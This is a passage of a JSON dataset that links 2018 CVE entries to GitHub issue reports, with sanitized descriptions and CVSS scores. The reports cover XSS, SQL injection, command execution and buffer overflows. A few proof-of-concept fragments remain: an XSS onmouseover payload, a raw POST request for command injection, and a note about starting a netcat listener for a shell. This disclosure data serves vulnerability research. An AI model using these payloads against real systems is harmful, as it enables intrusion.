  25993. "Repo_new": "panghusec/exploit",
  25994. "Issue_Created_At": "2018-08-15T10:25:39Z",
  25995. "description": "phpmywind NUMBERTAG Code Execution4. Attackers can get webshell or code execution APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin NUMBERTAG request FILETAG and inject the code FILETAG FILETAG FILETAG $cfg_webpath fill in NUMBERTAG cfg_author fill in APITAG",
  25996. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  25997. "severity": "HIGH",
  25998. "baseScore": 7.2,
  25999. "impactScore": 5.9,
  26000. "exploitabilityScore": 1.2
  26001. },
  26002. {
  26003. "CVE_ID": "CVE-2018-17142",
  26004. "Issue_Url_old": "https://github.com/golang/go/issues/27702",
  26005. "Issue_Url_new": "https://github.com/golang/go/issues/27702",
  26006. "Repo_new": "golang/go",
  26007. "Issue_Created_At": "2018-09-17T01:46:37Z",
  26008. "description": "PATHTAG APITAG panic caused by malformed data. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? go version APITAG linux/amd NUMBERTAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit What did you see instead? ERRORTAG",
  26009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26010. "severity": "HIGH",
  26011. "baseScore": 7.5,
  26012. "impactScore": 3.6,
  26013. "exploitabilityScore": 3.9
  26014. },
  26015. {
  26016. "CVE_ID": "CVE-2018-17143",
  26017. "Issue_Url_old": "https://github.com/golang/go/issues/27704",
  26018. "Issue_Url_new": "https://github.com/golang/go/issues/27704",
  26019. "Repo_new": "golang/go",
  26020. "Issue_Created_At": "2018-09-17T02:05:34Z",
  26021. "description": "PATHTAG panic: runtime error: invalid memory address or nil pointer dereference. Please answer these questions before submitting your issue. Thanks! What version of Go are you using ( go version )? go version APITAG linux/amd NUMBERTAG Does this issue reproduce with the latest release? yes What operating system and processor architecture are you using ( go env )? CODETAG What did you do? CODETAG What did you expect to see? No panic exit. What did you see instead? ERRORTAG",
  26022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26023. "severity": "HIGH",
  26024. "baseScore": 7.5,
  26025. "impactScore": 3.6,
  26026. "exploitabilityScore": 3.9
  26027. },
  26028. {
  26029. "CVE_ID": "CVE-2018-17175",
  26030. "Issue_Url_old": "https://github.com/marshmallow-code/marshmallow/issues/772",
  26031. "Issue_Url_new": "https://github.com/marshmallow-code/marshmallow/issues/772",
  26032. "Repo_new": "marshmallow-code/marshmallow",
  26033. "Issue_Created_At": "2018-04-12T23:11:28Z",
  26034. "description": "Empty Only Treated as None. When the only parameter is an empty list/set, it causes all the fields to be de/serialized like None . The implementation of NUMBERTAG and NUMBERTAG are not in compliance with their respective docs. > only (_tuple_) \u2013 A list or tuple of fields to serialize. If None , all fields will be serialized. CODETAG This could create a security vulnerability if an application was dynamically generating the field set based on security role. A filter that was meant to hide everything would inadvertently show everything.",
  26035. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  26036. "severity": "MEDIUM",
  26037. "baseScore": 5.3,
  26038. "impactScore": 1.4,
  26039. "exploitabilityScore": 3.9
  26040. },
  26041. {
  26042. "CVE_ID": "CVE-2018-17229",
  26043. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/453",
  26044. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/453",
  26045. "Repo_new": "exiv2/exiv2",
  26046. "Issue_Created_At": "2018-09-17T14:18:53Z",
  26047. "description": "APITAG heap buffer overflow in APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master b6a8d NUMBERTAG APITAG URLTAG ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  26048. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26049. "severity": "MEDIUM",
  26050. "baseScore": 6.5,
  26051. "impactScore": 3.6,
  26052. "exploitabilityScore": 2.8
  26053. },
  26054. {
  26055. "CVE_ID": "CVE-2018-17230",
  26056. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/455",
  26057. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/455",
  26058. "Repo_new": "exiv2/exiv2",
  26059. "Issue_Created_At": "2018-09-17T14:18:56Z",
  26060. "description": "APITAG heap buffer overflow in APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master b6a8d NUMBERTAG APITAG URLTAG ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  26061. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26062. "severity": "MEDIUM",
  26063. "baseScore": 6.5,
  26064. "impactScore": 3.6,
  26065. "exploitabilityScore": 2.8
  26066. },
  26067. {
  26068. "CVE_ID": "CVE-2018-17232",
  26069. "Issue_Url_old": "https://github.com/docmarionum1/slack-archive-bot/issues/12",
  26070. "Issue_Url_new": "https://github.com/docmarionum1/slack-archive-bot/issues/12",
  26071. "Repo_new": "docmarionum1/slack-archive-bot",
  26072. "Issue_Created_At": "2018-09-19T19:37:02Z",
  26073. "description": "Fix security vulnerabilities NUMBERTAG SQL injection. When searching the archive user input is used directly to create an SQL query. This can be exploited to view all messages, including messages from private channels the user is not a member of. Potentially exploitable to gain Remote Code Execution (RCE) depending on the configuration of the server NUMBERTAG Information disclosure. If a user searches for a phrase that has been posted in a private channel the user is not a member of, the bot returns nothing rather than \"No results found\". This leaks to the user that the phrase has been said.",
  26074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26075. "severity": "CRITICAL",
  26076. "baseScore": 9.8,
  26077. "impactScore": 5.9,
  26078. "exploitabilityScore": 3.9
  26079. },
  26080. {
  26081. "CVE_ID": "CVE-2018-17282",
  26082. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/457",
  26083. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/457",
  26084. "Repo_new": "exiv2/exiv2",
  26085. "Issue_Created_At": "2018-09-20T14:54:34Z",
  26086. "description": "SEGV in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, Exi NUMBERTAG master NUMBERTAG b NUMBERTAG APITAG URLTAG gdb info: ERRORTAG Asan info: ERRORTAG Addition: This bug was found with mem AFL, which is based on AFL. Mem AFL is developed by Yanhao( EMAILTAG ) & Marsman NUMBERTAG EMAILTAG )",
  26087. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26088. "severity": "MEDIUM",
  26089. "baseScore": 6.5,
  26090. "impactScore": 3.6,
  26091. "exploitabilityScore": 2.8
  26092. },
  26093. {
  26094. "CVE_ID": "CVE-2018-17283",
  26095. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/4",
  26096. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/4",
  26097. "Repo_new": "x-f1v3/forcve",
  26098. "Issue_Created_At": "2018-09-20T11:15:20Z",
  26099. "description": "Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection. Zoho manageengine Firewall Analyzer permission bypass vulnerability which can lead to information disclosure and SQL injection Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn Firewall Analyzer NUMBERTAG Build NUMBERTAG has permission bypass Vulnerability which can lead to information disclosure and SQL injection Proof of Concept: Getting the apikey unauthorizedly: CODETAG Local site test: FILETAG Add the admin user by only using the apikey poc: ERRORTAG Local site test: FILETAG FILETAG Sql injection by only using the apikey poc: CODETAG FILETAG FILETAG",
  26100. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  26101. "severity": "HIGH",
  26102. "baseScore": 7.5,
  26103. "impactScore": 3.6,
  26104. "exploitabilityScore": 3.9
  26105. },
  26106. {
  26107. "CVE_ID": "CVE-2018-17292",
  26108. "Issue_Url_old": "https://github.com/WAVM/WAVM/issues/109",
  26109. "Issue_Url_new": "https://github.com/wavm/wavm/issues/109",
  26110. "Repo_new": "wavm/wavm",
  26111. "Issue_Created_At": "2018-09-16T09:05:30Z",
  26112. "description": "Mishandling input files with file length less than NUMBERTAG bytes (crash). During loading module ( URLTAG there is a missing check for cases where file bytes are less than NUMBERTAG bytes. This may crash wavm. For example, when the input only contains APITAG , APITAG reports ERRORTAG In another extreme case, when the input is empty string, it raises SIGSEGV .",
  26113. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26114. "severity": "MEDIUM",
  26115. "baseScore": 6.5,
  26116. "impactScore": 3.6,
  26117. "exploitabilityScore": 2.8
  26118. },
  26119. {
  26120. "CVE_ID": "CVE-2018-17293",
  26121. "Issue_Url_old": "https://github.com/WAVM/WAVM/issues/110",
  26122. "Issue_Url_new": "https://github.com/wavm/wavm/issues/110",
  26123. "Repo_new": "wavm/wavm",
  26124. "Issue_Created_At": "2018-09-16T11:40:56Z",
  26125. "description": "Unhandled runtime exception: APITAG (sigabrt). When executing APITAG , the vm may trigger a ERRORTAG as of NUMBERTAG e8b9. POCs: FILETAG FILETAG gdb output is like: ERRORTAG",
  26126. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26127. "severity": "HIGH",
  26128. "baseScore": 8.8,
  26129. "impactScore": 5.9,
  26130. "exploitabilityScore": 2.8
  26131. },
  26132. {
  26133. "CVE_ID": "CVE-2018-17294",
  26134. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/635",
  26135. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/635",
  26136. "Repo_new": "liblouis/liblouis",
  26137. "Issue_Created_At": "2018-09-01T02:43:25Z",
  26138. "description": "APITAG stack buffer overflow at APITAG APITAG may suffer from a stack buffer overflow on a stack variable inbuf defined in APITAG . Relevant files are available here URLTAG . Command lines to trigger the crashes: CODETAG A sample ASAN output is like: ERRORTAG",
  26139. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  26140. "severity": "MEDIUM",
  26141. "baseScore": 6.5,
  26142. "impactScore": 3.6,
  26143. "exploitabilityScore": 2.8
  26144. },
  26145. {
  26146. "CVE_ID": "CVE-2018-17297",
  26147. "Issue_Url_old": "https://github.com/looly/hutool/issues/162",
  26148. "Issue_Url_new": "https://github.com/dromara/hutool/issues/162",
  26149. "Repo_new": "dromara/hutool",
  26150. "Issue_Created_At": "2018-09-13T02:51:52Z",
  26151. "description": "zip_slip\u6f0f\u6d1e. \u5927\u5bb6\u597d, APITAG . \u8be6\u7ec6\u4fe1\u606f\u5982\u4e0b\uff1a FILETAG FILETAG APITAG NUMBERTAG",
  26152. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  26153. "severity": "HIGH",
  26154. "baseScore": 7.5,
  26155. "impactScore": 3.6,
  26156. "exploitabilityScore": 3.9
  26157. },
  26158. {
  26159. "CVE_ID": "CVE-2018-17300",
  26160. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/4",
  26161. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/4",
  26162. "Repo_new": "cuppacms/cuppacms",
  26163. "Issue_Created_At": "2018-08-16T12:46:28Z",
  26164. "description": "XSS APITAG in APITAG Affected software: APITAG Type of vulnerability: XSS APITAG Discovered by: Provensec LLC Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login to the cuppa cms. Step2:URL: URLTAG Go to the section menus and click on add item, and name them with malicious javascript. FILETAG Step3: Here the xss got executed. FILETAG",
  26165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26166. "severity": "MEDIUM",
  26167. "baseScore": 4.8,
  26168. "impactScore": 2.7,
  26169. "exploitabilityScore": 1.7
  26170. },
  26171. {
  26172. "CVE_ID": "CVE-2018-17301",
  26173. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1038",
  26174. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1038",
  26175. "Repo_new": "espocrm/espocrm",
  26176. "Issue_Created_At": "2018-09-13T07:43:03Z",
  26177. "description": "Non Persistent or Type II XSS in APITAG NUMBERTAG Affected software: APITAG NUMBERTAG Type of vulnerability: Non Persistent or Type II XSS Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Reflected attacks are those where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as in an e mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable website, which reflects the attack back to the user\u2019s browser. The browser then executes the code because it came from a \"trusted\" server. Reflected XSS is also sometimes referred to as Non Persistent or Type II XSS. Proof of concept: Step1: Login to the CRM. Step2: In the search panel, use the malicious javascript and hit enter the code will get executed successfully. FILETAG FILETAG APITAG URLTAG",
  26178. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26179. "severity": "MEDIUM",
  26180. "baseScore": 5.4,
  26181. "impactScore": 2.7,
  26182. "exploitabilityScore": 2.3
  26183. },
  26184. {
  26185. "CVE_ID": "CVE-2018-17302",
  26186. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1039",
  26187. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1039",
  26188. "Repo_new": "espocrm/espocrm",
  26189. "Issue_Created_At": "2018-09-13T07:47:55Z",
  26190. "description": "Stored XSS in APITAG NUMBERTAG Affected software: APITAG NUMBERTAG Type of vulnerability: Stored XSS Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type I XSS. Proof of concept: Step1: Login into the CRM and in the mailbox use the link for entering the malicious javascript into it and save it as a draft message and whenever you open the draft msg the malicious javascript will get executed. FILETAG FILETAG APITAG URLTAG",
  26191. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  26192. "severity": "MEDIUM",
  26193. "baseScore": 5.4,
  26194. "impactScore": 2.7,
  26195. "exploitabilityScore": 2.3
  26196. },
  26197. {
  26198. "CVE_ID": "CVE-2018-17317",
  26199. "Issue_Url_old": "https://github.com/PatatasFritas/PatataWifi/issues/1",
  26200. "Issue_Url_new": "https://github.com/patatasfritas/patatawifi/issues/1",
  26201. "Repo_new": "PatatasFritas/PatataWifi",
  26202. "Issue_Created_At": "2018-09-16T04:36:17Z",
  26203. "description": "Command to execute security issues. File FILETAG : APITAG NUMBERTAG output); //DEBUG SHOW ERRORS (da problemas cuando se usa para ejecutar un servicio) //LOG $rs = APITAG 'a'); fwrite($rs, date(\"Y m d H:i:s\").\" \".\"$bin_exec sh c $exec \"); if(is_array($output) and array_key_exists NUMBERTAG output)) { fwrite($rs, APITAG \"); } elseif (is_string($output)) { fwrite($rs, APITAG \"); } fclose($rs); return $output; } Command execution was formed. POC: POST FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Cookie: APITAG APITAG APITAG APITAG APITAG APITAG logged_in=yes; dotcom_user=ly NUMBERTAG has_recent_activity NUMBERTAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG",
  26204. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26205. "severity": "CRITICAL",
  26206. "baseScore": 9.8,
  26207. "impactScore": 5.9,
  26208. "exploitabilityScore": 3.9
  26209. },
  26210. {
  26211. "CVE_ID": "CVE-2018-17317",
  26212. "Issue_Url_old": "https://github.com/xtr4nge/FruityWifi/issues/276",
  26213. "Issue_Url_new": "https://github.com/xtr4nge/fruitywifi/issues/276",
  26214. "Repo_new": "xtr4nge/fruitywifi",
  26215. "Issue_Created_At": "2020-10-02T17:59:08Z",
  26216. "description": "Remote Command Execution in APITAG NUMBERTAG Issue Description: During the analysis of the software it was observed that the fruitywifi APITAG io_mode= PATHTAG NUMBERTAG Start a NC Listener on port NUMBERTAG Note : In order to bypass, we need to satisfy the qoutes then insert our payload and upon processing the request, you will be able to get the shell.",
  26217. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26218. "severity": "CRITICAL",
  26219. "baseScore": 9.8,
  26220. "impactScore": 5.9,
  26221. "exploitabilityScore": 3.9
  26222. },
  26223. {
  26224. "CVE_ID": "CVE-2018-17320",
  26225. "Issue_Url_old": "https://github.com/ucms/ucms/issues/1",
  26226. "Issue_Url_new": "https://github.com/ucms/ucms/issues/1",
  26227. "Repo_new": "ucms/ucms",
  26228. "Issue_Created_At": "2018-09-19T05:49:25Z",
  26229. "description": "ucms NUMBERTAG Storage XSS. Storage XSS in PATHTAG via minfo parameter FILETAG column name=>mname FILETAG skipping to FILETAG \uff0ctracking the four parameter. As the $_POST FILETAG as check for mname,the program checked it's length which should be larger than one and smaller than twenty.it is also should fit its APITAG shouldn't use the column which has been reserved by cms. FILETAG following the function of dbstr,it check the two punctuation FILETAG then join those parameter to the sql statement and put it into database for execution FILETAG FILETAG finally\uff0cprogram skip to FILETAG at line NUMBERTAG a query via ucms_moudle\uff0cat line NUMBERTAG print the payload we have already insert into table FILETAG FILETAG",
  26230. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26231. "severity": "MEDIUM",
  26232. "baseScore": 6.1,
  26233. "impactScore": 2.7,
  26234. "exploitabilityScore": 2.8
  26235. },
  26236. {
  26237. "CVE_ID": "CVE-2018-17332",
  26238. "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/2",
  26239. "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/2",
  26240. "Repo_new": "agambier/libsvg2",
  26241. "Issue_Created_At": "2018-09-12T00:46:15Z",
  26242. "description": "bug1: a DOS Dead Block BUG. POC: URLTAG descrtiption: Dead Block DOS,a malloc operation is done just in this Dead Block, which will lead to system's memory being wasted and finally may lead to the collapse of system. APITAG APITAG is always set to NUMBERTAG CODETAG If None of the branches which can affect the value of APITAG APITAG will return the same value which is delivered as a parameter. Unfortunately, a malloc operation is done just in this Dead Block, which will lead to system's memory being wasted and finally may lead to the collapse of system.",
  26243. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  26244. "severity": "HIGH",
  26245. "baseScore": 7.5,
  26246. "impactScore": 3.6,
  26247. "exploitabilityScore": 3.9
  26248. },
  26249. {
  26250. "CVE_ID": "CVE-2018-17333",
  26251. "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/4",
  26252. "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/4",
  26253. "Repo_new": "agambier/libsvg2",
  26254. "Issue_Created_At": "2018-09-12T00:59:36Z",
  26255. "description": "bug NUMBERTAG another stack buffer overflow bug which may lead to RCE. ASAN: URLTAG POC: URLTAG EXP: URLTAG password:i5n2 Description: A sscanf operation without the check of string length, which may lead to stack over flow. When this lib is used to parse svg by a browser, RCE is possible. CODETAG APITAG This call of function doesn't check the string in APITAG which can lead to stack overflow! debug image: URLTAG",
  26256. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26257. "severity": "CRITICAL",
  26258. "baseScore": 9.8,
  26259. "impactScore": 5.9,
  26260. "exploitabilityScore": 3.9
  26261. },
  26262. {
  26263. "CVE_ID": "CVE-2018-17334",
  26264. "Issue_Url_old": "https://github.com/agambier/libsvg2/issues/3",
  26265. "Issue_Url_new": "https://github.com/agambier/libsvg2/issues/3",
  26266. "Repo_new": "agambier/libsvg2",
  26267. "Issue_Created_At": "2018-09-12T00:54:32Z",
  26268. "description": "bug2: a stack buffer overflow bug of parse WHICH may lead to RCE. POC: URLTAG ASAN: URLTAG Description: If APITAG can't hit the judge follow in a right range, the coptsize of strncpy may be too large, which will directly cause stack overflow. If the lib is used by a browser, RCE is possible! CODETAG APITAG APITAG pwndbg> p APITAG NUMBERTAG APITAG NUMBERTAG d pwndbg> p APITAG NUMBERTAG APITAG NUMBERTAG d NUMBERTAG saved $rbp and ret addr has been overwriteed, when bypassing the poc crash erro, $ip will be controlled. debug pic: URLTAG",
  26269. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26270. "severity": "CRITICAL",
  26271. "baseScore": 9.8,
  26272. "impactScore": 5.9,
  26273. "exploitabilityScore": 3.9
  26274. },
  26275. {
  26276. "CVE_ID": "CVE-2018-17336",
  26277. "Issue_Url_old": "https://github.com/storaged-project/udisks/issues/578",
  26278. "Issue_Url_new": "https://github.com/storaged-project/udisks/issues/578",
  26279. "Repo_new": "storaged-project/udisks",
  26280. "Issue_Created_At": "2018-09-16T04:52:50Z",
  26281. "description": "Malformed filesystem labels allows for a string format vulnerability. A malformed file system label can trigger a string format vulnerability in udisks. For example: CODETAG Crashes udisks2, and since the %n modifier allows for arbitrary memory manipulation this could pose a security risk, as udisksd runs root. ERRORTAG",
  26282. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  26283. "severity": "HIGH",
  26284. "baseScore": 7.8,
  26285. "impactScore": 5.9,
  26286. "exploitabilityScore": 1.8
  26287. },
  26288. {
  26289. "CVE_ID": "CVE-2018-17338",
  26290. "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/29",
  26291. "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/29",
  26292. "Repo_new": "kermitt2/pdfalto",
  26293. "Issue_Created_At": "2018-09-21T08:14:04Z",
  26294. "description": "Heap buffer overflow in function APITAG I used Clang NUMBERTAG and APITAG to build pdfalto URLTAG , this file URLTAG can cause heap buffer overflow in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
  26295. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  26296. "severity": "HIGH",
  26297. "baseScore": 7.8,
  26298. "impactScore": 5.9,
  26299. "exploitabilityScore": 1.8
  26300. },
  26301. {
  26302. "CVE_ID": "CVE-2018-17341",
  26303. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/345",
  26304. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/345",
  26305. "Repo_new": "bigtreecms/bigtree-cms",
  26306. "Issue_Created_At": "2018-09-22T18:03:54Z",
  26307. "description": "Arbitrary file read. when we use APITAG or APITAG Rewrite\" routing in FILETAG line NUMBERTAG ERRORTAG althouch APITAG has been baned,we can use APITAG bypass in windows and the we can control the path in PATHTAG line NUMBERTAG APITAG and we do not need Authenticated in FILETAG line NUMBERTAG APITAG if APITAG we can bypass Authenticated payload: APITAG",
  26308. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  26309. "severity": "HIGH",
  26310. "baseScore": 8.1,
  26311. "impactScore": 5.9,
  26312. "exploitabilityScore": 2.2
  26313. },
  26314. {
  26315. "CVE_ID": "CVE-2018-17361",
  26316. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/7",
  26317. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/7",
  26318. "Repo_new": "alterebro/weaselcms",
  26319. "Issue_Created_At": "2018-08-17T14:51:16Z",
  26320. "description": "I found a reflective XSS vulnerability. Mainly cause by using $_SERVER FILETAG FILETAG The payload here is: APITAG You should know that you have used this kind of method so many times. Actually, you can use APITAG to replace it. or use APITAG filter.",
  26321. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26322. "severity": "MEDIUM",
  26323. "baseScore": 6.1,
  26324. "impactScore": 2.7,
  26325. "exploitabilityScore": 2.8
  26326. },
  26327. {
  26328. "CVE_ID": "CVE-2018-17369",
  26329. "Issue_Url_old": "https://github.com/qzw1210/springboot_authority/issues/4",
  26330. "Issue_Url_new": "https://github.com/qzw1210/springboot_authority/issues/4",
  26331. "Repo_new": "qzw1210/springboot_authority",
  26332. "Issue_Created_At": "2018-09-12T08:09:09Z",
  26333. "description": "There are some stored xss via PATHTAG via PATHTAG APITAG name and description parameters has stored xss FILETAG FILETAG",
  26334. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26335. "severity": "MEDIUM",
  26336. "baseScore": 4.8,
  26337. "impactScore": 2.7,
  26338. "exploitabilityScore": 1.7
  26339. },
  26340. {
  26341. "CVE_ID": "CVE-2018-17420",
  26342. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/37",
  26343. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/37",
  26344. "Repo_new": "94fzb/zrlog",
  26345. "Issue_Created_At": "2018-09-18T15:43:11Z",
  26346. "description": "There is a sql injection in the article search box. APITAG CODETAG TABLE_NAME Field not verified",
  26347. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  26348. "severity": "HIGH",
  26349. "baseScore": 7.2,
  26350. "impactScore": 5.9,
  26351. "exploitabilityScore": 1.2
  26352. },
  26353. {
  26354. "CVE_ID": "CVE-2018-17421",
  26355. "Issue_Url_old": "https://github.com/94fzb/zrlog/issues/39",
  26356. "Issue_Url_new": "https://github.com/94fzb/zrlog/issues/39",
  26357. "Repo_new": "94fzb/zrlog",
  26358. "Issue_Created_At": "2018-09-18T16:01:05Z",
  26359. "description": "There is a stored XSS in the file upload area. After the file is uploaded correctly, \" APITAG \" will be displayed in the edit APITAG with the page display, the XSS purpose is achieved by modifying the display content. Poc click me aa\"onmouseover=\"alert NUMBERTAG s= \"click me\") The page is displayed as \" APITAG \"",
  26360. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26361. "severity": "MEDIUM",
  26362. "baseScore": 6.1,
  26363. "impactScore": 2.7,
  26364. "exploitabilityScore": 2.8
  26365. },
  26366. {
  26367. "CVE_ID": "CVE-2018-17422",
  26368. "Issue_Url_old": "https://github.com/dotCMS/core/issues/15286",
  26369. "Issue_Url_new": "https://github.com/dotcms/core/issues/15286",
  26370. "Repo_new": "dotcms/core",
  26371. "Issue_Created_At": "2018-09-14T07:04:46Z",
  26372. "description": "APITAG NUMBERTAG open redirect. Current Behavior APITAG NUMBERTAG allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a malformed URL e.g. CODETAG FILETAG Possible Solution limit the redirect target",
  26373. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  26374. "severity": "MEDIUM",
  26375. "baseScore": 6.1,
  26376. "impactScore": 2.7,
  26377. "exploitabilityScore": 2.8
  26378. },
  26379. {
  26380. "CVE_ID": "CVE-2018-17423",
  26381. "Issue_Url_old": "https://github.com/e107inc/e107/issues/3414",
  26382. "Issue_Url_new": "https://github.com/e107inc/e107/issues/3414",
  26383. "Repo_new": "e107inc/e107",
  26384. "Issue_Created_At": "2018-09-03T02:35:20Z",
  26385. "description": "Stored XSS on update comments in NUMBERTAG Greetings, Hello e NUMBERTAG team, while i use this CMS, i found some security issues(maybe, i call it stored xss). Steps to reproduce Open web browser(i used Chrome). Log into e NUMBERTAG with admin. Switch to admin area, and check comments pending, select options 'edit'. In Comments area writes APITAG . Click FILETAG , and found box. FILETAG Impact In Step3, the attack must log in as admin, but the comment can be seen by all user. I hope it helps to improve e NUMBERTAG",
  26386. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  26387. "severity": "MEDIUM",
  26388. "baseScore": 4.8,
  26389. "impactScore": 2.7,
  26390. "exploitabilityScore": 1.7
  26391. },
  26392. {
  26393. "CVE_ID": "CVE-2018-17425",
  26394. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/153",
  26395. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/153",
  26396. "Repo_new": "wuzhicms/wuzhicms",
  26397. "Issue_Created_At": "2018-09-19T03:16:02Z",
  26398. "description": "Front end user login Membership Center I want to ask detailed description > storage XSS vulnerabilities found in the system Bulletin. Front end user login Membership Center I want to ask detailed description > storage XSS vulnerabilities found in the system Bulletin poc xss payload: APITAG Steps to Reproduce URLTAG FILETAG FILETAG FILETAG",
  26399. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
